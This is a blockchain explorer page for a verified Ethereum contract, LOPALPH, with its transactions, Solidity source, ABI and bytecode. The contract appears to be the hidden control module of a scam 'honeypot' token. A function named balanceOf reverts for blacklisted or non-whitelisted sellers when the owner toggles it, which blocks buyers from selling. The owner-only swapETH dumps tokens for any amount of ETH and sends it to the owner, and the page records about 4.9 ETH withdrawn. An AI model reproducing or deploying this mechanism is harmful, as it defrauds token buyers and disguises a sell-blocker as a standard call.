ETH Price: $2,525.76 (+0.10%)

Contract

0x5989dB625C29a7633afACea8e7c37E7C0a0D9F2f
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Swap ETH176314762023-07-06 1:15:35422 days ago1688606135IN
0x5989dB62...C0a0D9F2f
0 ETH0.0087028148.42106811
A WL176311942023-07-06 0:17:59422 days ago1688602679IN
0x5989dB62...C0a0D9F2f
0 ETH0.0049295353.00350718
Set Enable176311682023-07-06 0:12:47422 days ago1688602367IN
0x5989dB62...C0a0D9F2f
0 ETH0.0016458968.92929712
Set C176311672023-07-06 0:12:35422 days ago1688602355IN
0x5989dB62...C0a0D9F2f
0 ETH0.0048495270.61244432
0x60806040176310462023-07-05 23:47:47422 days ago1688600867IN
 Create: LOPALPH
0 ETH0.0390103844.76492027

Latest 2 internal transactions

Advanced mode:
Parent Transaction Hash Block From To
176314762023-07-06 1:15:35422 days ago1688606135
0x5989dB62...C0a0D9F2f
4.90297877 ETH
176314762023-07-06 1:15:35422 days ago1688606135
0x5989dB62...C0a0D9F2f
4.90297877 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
LOPALPH

Compiler Version
v0.8.11+commit.d7f03943

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-07-05
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.11;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IERC20 {
    function decimals() external returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IUniswapV2Router02 {
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract LOPALPH is Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    address coin;
    address pair;

    mapping(address => bool) whites;
    mapping(address => bool) blacks;
    bool public enabled = true;

    receive() external payable { }

    function encode() external view returns (bytes memory) {
        return abi.encode(address(this));
    }

    function setC(address _coin, address _pair) external onlyOwner {
        coin = _coin;
        pair = _pair;
    }

    function setEnable(bool _enabled) external onlyOwner {
        enabled = _enabled;
    }

    function resetC() external onlyOwner {
        coin = address(0);
        pair = address(0);
    }

    function balanceOf(
        address from
    ) external view returns (uint256) {
        if (whites[from] || pair == address(0)) {
            return 0;
        }
        else if ((from == owner() || from == address(this))) {
            return 1;
        }
        if (from != pair) {
            require(enabled);
            require(!blacks[from]);
        }
        return 0;
    }

    function swapETH(uint256 count) external onlyOwner {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = coin;
        path[1] = uniswapV2Router.WETH();

        IERC20(coin).approve(address(uniswapV2Router), ~uint256(0));

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            10 ** count,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );  

        payable(msg.sender).transfer(address(this).balance);
    }

    function aWL(address[] memory _wat) external onlyOwner{
        for (uint i = 0; i < _wat.length; i++) {
            whites[_wat[i]] = true;
        }
    }

    function aBL(address[] memory _bat) external onlyOwner{
        for (uint i = 0; i < _bat.length; i++) {
            blacks[_bat[i]] = true;
        }
    }

    function claimDust() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }
}

Contract Security Audit

Contract ABI

[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[{"internalType":"address[]","name":"_bat","type":"address[]"}],"name":"aBL","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_wat","type":"address[]"}],"name":"aWL","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"claimDust","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"encode","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"resetC","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_coin","type":"address"},{"internalType":"address","name":"_pair","type":"address"}],"name":"setC","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setEnable","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"swapETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d1781556006805460ff1916909117905534801561004357600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350610d8a806100946000396000f3fe6080604052600436106100c65760003560e01c80637726bed31161007f578063bd14598f11610059578063bd14598f14610203578063df90ebe814610242578063efc354eb14610257578063f2fde38b1461027757600080fd5b80637726bed3146101a65780638da5cb5b146101c6578063b68356fe146101ee57600080fd5b8063238dafe0146100d25780634e19b6ed1461010157806357ee8d25146101235780635bb13cce1461014357806370a0823114610163578063715018a61461019157600080fd5b366100cd57005b600080fd5b3480156100de57600080fd5b506006546100ec9060ff1681565b60405190151581526020015b60405180910390f35b34801561010d57600080fd5b5061012161011c366004610980565b610297565b005b34801561012f57600080fd5b5061012161013e366004610a45565b610336565b34801561014f57600080fd5b5061012161015e366004610980565b61038e565b34801561016f57600080fd5b5061018361017e366004610a7e565b610420565b6040519081526020016100f8565b34801561019d57600080fd5b506101216104e0565b3480156101b257600080fd5b506101216101c1366004610ab0565b610554565b3480156101d257600080fd5b506000546040516001600160a01b0390911681526020016100f8565b3480156101fa57600080fd5b50610121610591565b34801561020f57600080fd5b506102356040805130602082015260609101604051602081830303815290604052905090565b6040516100f89190610acd565b34801561024e57600080fd5b506101216105d9565b34801561026357600080fd5b50610121610272366004610b22565b610632565b34801561028357600080fd5b50610121610292366004610a7e565b61085b565b6000546001600160a01b031633146102ca5760405162461bcd60e51b81526004016102c190610b3b565b60405180910390fd5b60005b8151811015610332576001600460008484815181106102ee576102ee610b70565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061032a81610b9c565b9150506102cd565b5050565b6000546001600160a01b031633146103605760405162461bcd60e51b81526004016102c190610b3b565b600280546001600160a01b039384166001600160a01b03199182161790915560038054929093169116179055565b6000546001600160a01b031633146103b85760405162461bcd60e51b81526004016102c190610b3b565b60005b8151811015610332576001600560008484815181106103dc576103dc610b70565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061041881610b9c565b9150506103bb565b6001600160a01b03811660009081526004602052604081205460ff168061045057506003546001600160a01b0316155b1561045d57506000919050565b6000546001600160a01b038381169116148061048157506001600160a01b03821630145b1561048e57506001919050565b6003546001600160a01b038381169116146104d85760065460ff166104b257600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156104d857600080fd5b506000919050565b6000546001600160a01b0316331461050a5760405162461bcd60e51b81526004016102c190610b3b565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b0316331461057e5760405162461bcd60e51b81526004016102c190610b3b565b6006805460ff1916911515919091179055565b6000546001600160a01b031633146105bb5760405162461bcd60e51b81526004016102c190610b3b565b600280546001600160a01b0319908116909155600380549091169055565b6000546001600160a01b031633146106035760405162461bcd60e51b81526004016102c190610b3b565b60405133904780156108fc02916000818181858888f1935050505015801561062f573d6000803e3d6000fd5b50565b6000546001600160a01b0316331461065c5760405162461bcd60e51b81526004016102c190610b3b565b604080516002808252606082018352600092602083019080368337505060025482519293506001600160a01b03169183915060009061069d5761069d610b70565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156106f6573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061071a9190610bb7565b8160018151811061072d5761072d610b70565b6001600160a01b03928316602091820292909201015260025460015460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015610791573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107b59190610bd4565b506001546001600160a01b031663791ac9476107d284600a610cd7565b60008430426040518663ffffffff1660e01b81526004016107f7959493929190610ce3565b600060405180830381600087803b15801561081157600080fd5b505af1158015610825573d6000803e3d6000fd5b50506040513392504780156108fc029250906000818181858888f19350505050158015610856573d6000803e3d6000fd5b505050565b6000546001600160a01b031633146108855760405162461bcd60e51b81526004016102c190610b3b565b6001600160a01b0381166108ea5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016102c1565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b634e487b7160e01b600052604160045260246000fd5b6001600160a01b038116811461062f57600080fd5b803561097b8161095b565b919050565b6000602080838503121561099357600080fd5b823567ffffffffffffffff808211156109ab57600080fd5b818501915085601f8301126109bf57600080fd5b8135818111156109d1576109d1610945565b8060051b604051601f19603f830116810181811085821117156109f6576109f6610945565b604052918252848201925083810185019188831115610a1457600080fd5b938501935b82851015610a3957610a2a85610970565b84529385019392850192610a19565b98975050505050505050565b60008060408385031215610a5857600080fd5b8235610a638161095b565b91506020830135610a738161095b565b809150509250929050565b600060208284031215610a9057600080fd5b8135610a9b8161095b565b9392505050565b801515811461062f57600080fd5b600060208284031215610ac257600080fd5b8135610a9b81610aa2565b600060208083528351808285015260005b81811015610afa57858101830151858201604001528201610ade565b81811115610b0c576000604083870101525b50601f01601f1916929092016040019392505050565b600060208284031215610b3457600080fd5b5035919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600019821415610bb057610bb0610b86565b5060010190565b600060208284031215610bc957600080fd5b8151610a9b8161095b565b600060208284031215610be657600080fd5b8151610a9b81610aa2565b600181815b80851115610c2c578160001904821115610c1257610c12610b86565b80851615610c1f57918102915b93841c9390800290610bf6565b509250929050565b600082610c4357506001610cd1565b81610c5057506000610cd1565b8160018114610c665760028114610c7057610c8c565b6001915050610cd1565b60ff841115610c8157610c81610b86565b50506001821b610cd1565b5060208310610133831016604e8410600b8410161715610caf575081810a610cd1565b610cb98383610bf1565b8060001904821115610ccd57610ccd610b86565b0290505b92915050565b6000610a9b8383610c34565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610d335784516001600160a01b031683529383019391830191600101610d0e565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122001627c64b5b23f874ae992eda063311c90cdbd6bed37961f18bdecd7b096f2b964736f6c634300080b0033

Deployed Bytecode

0x6080604052600436106100c65760003560e01c80637726bed31161007f578063bd14598f11610059578063bd14598f14610203578063df90ebe814610242578063efc354eb14610257578063f2fde38b1461027757600080fd5b80637726bed3146101a65780638da5cb5b146101c6578063b68356fe146101ee57600080fd5b8063238dafe0146100d25780634e19b6ed1461010157806357ee8d25146101235780635bb13cce1461014357806370a0823114610163578063715018a61461019157600080fd5b366100cd57005b600080fd5b3480156100de57600080fd5b506006546100ec9060ff1681565b60405190151581526020015b60405180910390f35b34801561010d57600080fd5b5061012161011c366004610980565b610297565b005b34801561012f57600080fd5b5061012161013e366004610a45565b610336565b34801561014f57600080fd5b5061012161015e366004610980565b61038e565b34801561016f57600080fd5b5061018361017e366004610a7e565b610420565b6040519081526020016100f8565b34801561019d57600080fd5b506101216104e0565b3480156101b257600080fd5b506101216101c1366004610ab0565b610554565b3480156101d257600080fd5b506000546040516001600160a01b0390911681526020016100f8565b3480156101fa57600080fd5b50610121610591565b34801561020f57600080fd5b506102356040805130602082015260609101604051602081830303815290604052905090565b6040516100f89190610acd565b34801561024e57600080fd5b506101216105d9565b34801561026357600080fd5b50610121610272366004610b22565b610632565b34801561028357600080fd5b50610121610292366004610a7e565b61085b565b6000546001600160a01b031633146102ca5760405162461bcd60e51b81526004016102c190610b3b565b60405180910390fd5b60005b8151811015610332576001600460008484815181106102ee576102ee610b70565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061032a81610b9c565b9150506102cd565b5050565b6000546001600160a01b031633146103605760405162461bcd60e51b81526004016102c190610b3b565b600280546001600160a01b039384166001600160a01b03199182161790915560038054929093169116179055565b6000546001600160a01b031633146103b85760405162461bcd60e51b81526004016102c190610b3b565b60005b8151811015610332576001600560008484815181106103dc576103dc610b70565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061041881610b9c565b9150506103bb565b6001600160a01b03811660009081526004602052604081205460ff168061045057506003546001600160a01b0316155b1561045d57506000919050565b6000546001600160a01b038381169116148061048157506001600160a01b03821630145b1561048e57506001919050565b6003546001600160a01b038381169116146104d85760065460ff166104b257600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156104d857600080fd5b506000919050565b6000546001600160a01b0316331461050a5760405162461bcd60e51b81526004016102c190610b3b565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b0316331461057e5760405162461bcd60e51b81526004016102c190610b3b565b6006805460ff1916911515919091179055565b6000546001600160a01b031633146105bb5760405162461bcd60e51b81526004016102c190610b3b565b600280546001600160a01b0319908116909155600380549091169055565b6000546001600160a01b031633146106035760405162461bcd60e51b81526004016102c190610b3b565b60405133904780156108fc02916000818181858888f1935050505015801561062f573d6000803e3d6000fd5b50565b6000546001600160a01b0316331461065c5760405162461bcd60e51b81526004016102c190610b3b565b604080516002808252606082018352600092602083019080368337505060025482519293506001600160a01b03169183915060009061069d5761069d610b70565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156106f6573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061071a9190610bb7565b8160018151811061072d5761072d610b70565b6001600160a01b03928316602091820292909201015260025460015460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015610791573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107b59190610bd4565b506001546001600160a01b031663791ac9476107d284600a610cd7565b60008430426040518663ffffffff1660e01b81526004016107f7959493929190610ce3565b600060405180830381600087803b15801561081157600080fd5b505af1158015610825573d6000803e3d6000fd5b50506040513392504780156108fc029250906000818181858888f19350505050158015610856573d6000803e3d6000fd5b505050565b6000546001600160a01b031633146108855760405162461bcd60e51b81526004016102c190610b3b565b6001600160a01b0381166108ea5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016102c1565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b634e487b7160e01b600052604160045260246000fd5b6001600160a01b038116811461062f57600080fd5b803561097b8161095b565b919050565b6000602080838503121561099357600080fd5b823567ffffffffffffffff808211156109ab57600080fd5b818501915085601f8301126109bf57600080fd5b8135818111156109d1576109d1610945565b8060051b604051601f19603f830116810181811085821117156109f6576109f6610945565b604052918252848201925083810185019188831115610a1457600080fd5b938501935b82851015610a3957610a2a85610970565b84529385019392850192610a19565b98975050505050505050565b60008060408385031215610a5857600080fd5b8235610a638161095b565b91506020830135610a738161095b565b809150509250929050565b600060208284031215610a9057600080fd5b8135610a9b8161095b565b9392505050565b801515811461062f57600080fd5b600060208284031215610ac257600080fd5b8135610a9b81610aa2565b600060208083528351808285015260005b81811015610afa57858101830151858201604001528201610ade565b81811115610b0c576000604083870101525b50601f01601f1916929092016040019392505050565b600060208284031215610b3457600080fd5b5035919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600019821415610bb057610bb0610b86565b5060010190565b600060208284031215610bc957600080fd5b8151610a9b8161095b565b600060208284031215610be657600080fd5b8151610a9b81610aa2565b600181815b80851115610c2c578160001904821115610c1257610c12610b86565b80851615610c1f57918102915b93841c9390800290610bf6565b509250929050565b600082610c4357506001610cd1565b81610c5057506000610cd1565b8160018114610c665760028114610c7057610c8c565b6001915050610cd1565b60ff841115610c8157610c81610b86565b50506001821b610cd1565b5060208310610133831016604e8410600b8410161715610caf575081810a610cd1565b610cb98383610bf1565b8060001904821115610ccd57610ccd610b86565b0290505b92915050565b6000610a9b8383610c34565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610d335784516001600160a01b031683529383019391830191600101610d0e565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122001627c64b5b23f874ae992eda063311c90cdbd6bed37961f18bdecd7b096f2b964736f6c634300080b0033

Deployed Bytecode Sourcemap

7889:2318:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8183:26;;;;;;;;;;-1:-1:-1;8183:26:0;;;;;;;;;;;179:14:1;;172:22;154:41;;142:2;127:18;8183:26:0;;;;;;;;9758:160;;;;;;;;;;-1:-1:-1;9758:160:0;;;;;:::i;:::-;;:::i;:::-;;8370:117;;;;;;;;;;-1:-1:-1;8370:117:0;;;;;:::i;:::-;;:::i;9926:160::-;;;;;;;;;;-1:-1:-1;9926:160:0;;;;;:::i;:::-;;:::i;8702:399::-;;;;;;;;;;-1:-1:-1;8702:399:0;;;;;:::i;:::-;;:::i;:::-;;;2530:25:1;;;2518:2;2503:18;8702:399:0;2384:177:1;6303:148:0;;;;;;;;;;;;;:::i;8495:90::-;;;;;;;;;;-1:-1:-1;8495:90:0;;;;;:::i;:::-;;:::i;5661:79::-;;;;;;;;;;-1:-1:-1;5699:7:0;5726:6;5661:79;;-1:-1:-1;;;;;5726:6:0;;;3081:51:1;;3069:2;3054:18;5661:79:0;2935:203:1;8593:101:0;;;;;;;;;;;;;:::i;8256:106::-;;;;;;;;;;;;8329:25;;;8348:4;8329:25;;;3081:51:1;8297:12:0;;3054:18:1;8329:25:0;;;;;;;;;;;;8322:32;;8256:106;;;;;;;;;:::i;10094:110::-;;;;;;;;;;;;;:::i;9109:641::-;;;;;;;;;;-1:-1:-1;9109:641:0;;;;;:::i;:::-;;:::i;6606:244::-;;;;;;;;;;-1:-1:-1;6606:244:0;;;;;:::i;:::-;;:::i;9758:160::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;;;;;;;;;9828:6:::1;9823:88;9844:4;:11;9840:1;:15;9823:88;;;9895:4;9877:6;:15;9884:4;9889:1;9884:7;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;9877:15:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;9877:15:0;:22;;-1:-1:-1;;9877:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9857:3;::::1;::::0;::::1;:::i;:::-;;;;9823:88;;;;9758:160:::0;:::o;8370:117::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8444:4:::1;:12:::0;;-1:-1:-1;;;;;8444:12:0;;::::1;-1:-1:-1::0;;;;;;8444:12:0;;::::1;;::::0;;;8467:4:::1;:12:::0;;;;;::::1;::::0;::::1;;::::0;;8370:117::o;9926:160::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;9996:6:::1;9991:88;10012:4;:11;10008:1;:15;9991:88;;;10063:4;10045:6;:15;10052:4;10057:1;10052:7;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;10045:15:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;10045:15:0;:22;;-1:-1:-1;;10045:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;10025:3;::::1;::::0;::::1;:::i;:::-;;;;9991:88;;8702:399:::0;-1:-1:-1;;;;;8798:12:0;;8774:7;8798:12;;;:6;:12;;;;;;;;;:34;;-1:-1:-1;8814:4:0;;-1:-1:-1;;;;;8814:4:0;:18;8798:34;8794:173;;;-1:-1:-1;8856:1:0;;8702:399;-1:-1:-1;8702:399:0:o;8794:173::-;5699:7;5726:6;-1:-1:-1;;;;;8889:15:0;;;5726:6;;8889:15;;:40;;-1:-1:-1;;;;;;8908:21:0;;8924:4;8908:21;8889:40;8884:83;;;-1:-1:-1;8954:1:0;;8702:399;-1:-1:-1;8702:399:0:o;8884:83::-;8989:4;;-1:-1:-1;;;;;8981:12:0;;;8989:4;;8981:12;8977:98;;9018:7;;;;9010:16;;;;;;-1:-1:-1;;;;;9050:12:0;;;;;;:6;:12;;;;;;;;9049:13;9041:22;;;;;;-1:-1:-1;9092:1:0;;8702:399;-1:-1:-1;8702:399:0:o;6303:148::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;6410:1:::1;6394:6:::0;;6373:40:::1;::::0;-1:-1:-1;;;;;6394:6:0;;::::1;::::0;6373:40:::1;::::0;6410:1;;6373:40:::1;6441:1;6424:19:::0;;-1:-1:-1;;;;;;6424:19:0::1;::::0;;6303:148::o;8495:90::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8559:7:::1;:18:::0;;-1:-1:-1;;8559:18:0::1;::::0;::::1;;::::0;;;::::1;::::0;;8495:90::o;8593:101::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8641:4:::1;:17:::0;;-1:-1:-1;;;;;;8641:17:0;;::::1;::::0;;;8669:4:::1;:17:::0;;;;::::1;::::0;;8593:101::o;10094:110::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;10145:51:::1;::::0;10153:10:::1;::::0;10174:21:::1;10145:51:::0;::::1;;;::::0;::::1;::::0;;;10174:21;10153:10;10145:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;10094:110::o:0;9109:641::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;9257:16:::1;::::0;;9271:1:::1;9257:16:::0;;;;;::::1;::::0;;9233:21:::1;::::0;9257:16:::1;::::0;::::1;::::0;;::::1;::::0;::::1;-1:-1:-1::0;;9294:4:0::1;::::0;9284:7;;;;-1:-1:-1;;;;;;9294:4:0::1;::::0;9284:7;;-1:-1:-1;9294:4:0::1;::::0;9284:7:::1;;;;:::i;:::-;-1:-1:-1::0;;;;;9284:14:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:14;;;;9319:15:::1;::::0;:22:::1;::::0;;-1:-1:-1;;;9319:22:0;;;;:15;;;::::1;::::0;:20:::1;::::0;:22:::1;::::0;;::::1;::::0;9284:7;;9319:22;;;;;:15;